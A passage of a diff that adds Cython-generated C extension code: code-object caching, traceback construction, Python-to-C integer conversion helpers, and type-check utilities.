{ + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ +#include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +/* CIntFromPyVerify */ +#define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* CIntFromPy */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* FormatTypeName */ +#if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__11)); + } + return name; +} +#endif + +/* CIntFromPy */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* FastTypeChecks */ +#if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int 